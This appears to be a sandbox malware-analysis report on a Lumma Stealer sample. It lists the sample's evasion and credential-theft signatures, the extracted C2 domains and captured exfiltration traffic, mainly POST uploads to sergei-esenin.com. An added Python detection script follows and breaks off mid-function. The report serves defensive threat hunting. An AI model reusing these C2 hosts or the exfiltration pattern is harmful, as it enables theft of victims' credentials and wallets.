Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1538068
MD5: ae7fda647df94fb9207204a517856151
SHA1: 57e738f83c355c72b9d48e0b120a27c40889c38e
SHA256: 7da052a541128f2cdacb400d37b765039cac8b4e293fc53a88ac721c144950c9
Tags: exe, user-Bitsight

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 7436 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AE7FDA647DF94FB9207204A517856151)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Malware configuration (LummaC): {"C2 url": ["clearancek.site", "mobbipenju.store", "dissapoiznw.store", "bathdoomgaz.store", "studennotediw.store", "eaglepawnoy.store", "licendfilteo.site", "spirittunek.store"], "Build id": "4SD0y4--legendaryy"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: file.exe PID: 7436 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: file.exe PID: 7436 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: file.exe PID: 7436 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
            No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-20T08:38:59.571722+0200 | 2056471 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 59915 | 1.1.1.1 | 53 | UDP
2024-10-20T08:38:59.584613+0200 | 2056485 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 63670 | 1.1.1.1 | 53 | UDP
2024-10-20T08:38:59.602547+0200 | 2056483 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 55049 | 1.1.1.1 | 53 | UDP
2024-10-20T08:38:59.614174+0200 | 2056481 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 59702 | 1.1.1.1 | 53 | UDP
2024-10-20T08:38:59.626740+0200 | 2056479 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 51355 | 1.1.1.1 | 53 | UDP
2024-10-20T08:38:59.636719+0200 | 2056477 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49241 | 1.1.1.1 | 53 | UDP
2024-10-20T08:38:59.648118+0200 | 2056475 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 64120 | 1.1.1.1 | 53 | UDP
2024-10-20T08:38:59.660237+0200 | 2056473 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 62543 | 1.1.1.1 | 53 | UDP
2024-10-20T08:39:01.696060+0200 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49730 | 104.102.49.254 | 443 | TCP
2024-10-20T08:39:02.704882+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.53.8 | 443 | TCP
2024-10-20T08:39:02.704882+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.53.8 | 443 | TCP
2024-10-20T08:39:04.345979+0200 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 104.21.53.8 | 443 | TCP
2024-10-20T08:39:04.345979+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 104.21.53.8 | 443 | TCP
2024-10-20T08:39:07.882161+0200 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49734 | 104.21.53.8 | 443 | TCP
2024-10-20T08:39:17.692929+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49739 | 104.21.53.8 | 443 | TCP

            AV Detection

Source: file.exe | Avira: detected
Source: https://steamcommunity.com:443/profiles/76561199724331900 | URL Reputation: Label: malware
Source: file.exe.7436.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["clearancek.site", "mobbipenju.store", "dissapoiznw.store", "bathdoomgaz.store", "studennotediw.store", "eaglepawnoy.store", "licendfilteo.site", "spirittunek.store"], "Build id": "4SD0y4--legendaryy"}
Source: sergei-esenin.com | Virustotal: Detection: 19%
Source: bathdoomgaz.store | Virustotal: Detection: 21%
Source: spirittunek.store | Virustotal: Detection: 21%
Source: file.exe | Virustotal: Detection: 43%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: clearancek.site
Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: licendfilteo.site
Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: spirittunek.store
Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: bathdoomgaz.store
Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: studennotediw.store
Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: dissapoiznw.store
Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: eaglepawnoy.store
Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: mobbipenju.store
Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: clearancek.site
Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: 4SD0y4--legendaryy
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49739 version: TLS 1.2

            Networking

Source: Network traffic | Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.4:55049 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.4:49241 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.4:59702 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.4:51355 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.4:64120 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.4:62543 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.4:63670 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.4:59915 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.53.8:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.53.8:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 104.21.53.8:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.53.8:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49734 -> 104.21.53.8:443
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49730 -> 104.102.49.254:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 104.21.53.8:443
Source: Malware configuration extractor | URLs: clearancek.site
Source: Malware configuration extractor | URLs: mobbipenju.store
Source: Malware configuration extractor | URLs: dissapoiznw.store
Source: Malware configuration extractor | URLs: bathdoomgaz.store
Source: Malware configuration extractor | URLs: studennotediw.store
Source: Malware configuration extractor | URLs: eaglepawnoy.store
Source: Malware configuration extractor | URLs: licendfilteo.site
Source: Malware configuration extractor | URLs: spirittunek.store
Source: Joe Sandbox View | IP Address: 104.21.53.8
Source: Joe Sandbox View | IP Address: 104.102.49.254
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: AKAMAI-ASUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: sergei-esenin.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Cookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/api | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 52 | Host: sergei-esenin.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | Cookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/api | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18168 | Host: sergei-esenin.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | Cookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/api | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8789 | Host: sergei-esenin.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | Cookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/api | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20442 | Host: sergei-esenin.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | Cookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/api | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1245 | Host: sergei-esenin.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | Cookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/api | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 586556 | Host: sergei-esenin.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Cookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/api | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 87 | Host: sergei-esenin.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (10 occurrences)
Source: file.exe, 00000000.00000002.1852469176.0000000001281000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.0000000001271000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ' https://cosergei-esenin.comsergei-esenin.comty/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcasQ7B | equals www.youtube.com (Youtube)
Source: file.exe, 00000000.00000003.1690568055.000000000129E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; | equals www.youtube.com (Youtube)
Source: file.exe, 00000000.00000003.1690697919.000000000128B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C0e3d185a3e106e73b244decdec33a0ea; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=af6637e6d5cd8f076664704a; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type34508Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSun, 20 Oct 2024 06:39:01 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control | equals www.youtube.com (Youtube)
Source: file.exe, 00000000.00000003.1690697919.000000000128B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; | equals www.youtube.com (Youtube)
Source: file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: t.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; | equals www.youtube.com (Youtube)
Source: file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: t.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C0e3d185a3e106e73b244decdec33a0ea; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=af6637e6d5cd8f076664704a; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type34508Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSun, 20 Oct 2024 06:39:01 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control | equals www.youtube.com (Youtube)
Source: file.exe, 00000000.00000002.1852469176.0000000001281000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.0000000001271000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ty/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcas | equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: clearancek.site
Source: global traffic | DNS traffic detected: DNS query: mobbipenju.store
Source: global traffic | DNS traffic detected: DNS query: eaglepawnoy.store
Source: global traffic | DNS traffic detected: DNS query: dissapoiznw.store
Source: global traffic | DNS traffic detected: DNS query: studennotediw.store
Source: global traffic | DNS traffic detected: DNS query: bathdoomgaz.store
Source: global traffic | DNS traffic detected: DNS query: spirittunek.store
Source: global traffic | DNS traffic detected: DNS query: licendfilteo.site
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic | DNS traffic detected: DNS query: sergei-esenin.com
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: sergei-esenin.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Sun, 20 Oct 2024 06:39:02 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | X-Frame-Options: SAMEORIGIN | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JuaMAjSNvLuGswKX4gwL3ISsU7GnOoH0MZusFU17FC9mbzufQz1G7FfB2N7Y92jiEyom3BtaFgA8Z0QU%2F39MyShlH%2F08IL7HYshTvlUjz98zeevg4wkRztf3156isbPjuHmEgA%3D%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8d5702296a0b535b-LAX
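The traffic rows above show a three-stage sequence: eight DNS lookups of the domains in the extracted configuration, a GET of a steamcommunity.com profile (the "Steam Profile Lookup" Suricata hit), and then a run of POST /api requests to sergei-esenin.com, a host that does not appear in the extracted configuration at all. The Python below is an added example, not code from Joe Sandbox, Joe Security or the Lumma project, that takes the configuration exactly as printed in this report and looks for the same sequence in Zeek-style JSON dns.log/http.log lines. It assumes Zeek's field names (ts, id.orig_h, query, method, host, uri, request_body_len), a 120-second correlation window, and constructed log lines built from the report's values rather than captured logs; that the Steam profile serves as a resolver for the live C2 host is an assumption the example makes, not something the report itself states.

```python
"""Hunt for the Lumma Stealer network sequence from this report in Zeek-style JSON logs.

Added example: not Joe Sandbox, Joe Security or Lumma code. Assumes Zeek JSON
dns.log/http.log field names. SAMPLE_LOGS are constructed from the report's values.
"""
from __future__ import annotations

import json
import re
from collections import defaultdict

# Configuration exactly as printed by the report's malware configuration extractor.
CONFIG_JSON = (
    '{"C2 url": ["clearancek.site", "mobbipenju.store", "dissapoiznw.store", '
    '"bathdoomgaz.store", "studennotediw.store", "eaglepawnoy.store", '
    '"licendfilteo.site", "spirittunek.store"], "Build id": "4SD0y4--legendaryy"}'
)

# 17-digit SteamID64 profile path, as in the observed GET /profiles/76561199724331900.
STEAM_PROFILE_RE = re.compile(r"^/profiles/\d{17}/?$")
WINDOW_SECONDS = 120  # assumption: the whole sequence completes within two minutes


def load_c2_domains(config_json: str) -> set[str]:
    """Normalize the 'C2 url' list of the extracted config into lowercase domains."""
    cfg = json.loads(config_json)
    return {d.strip().lower().rstrip(".") for d in cfg["C2 url"]}


def domain_hit(name: str, c2: set[str]) -> bool:
    """Exact or subdomain match, so a lookup of cdn.clearancek.site also fires."""
    name = name.strip().lower().rstrip(".")
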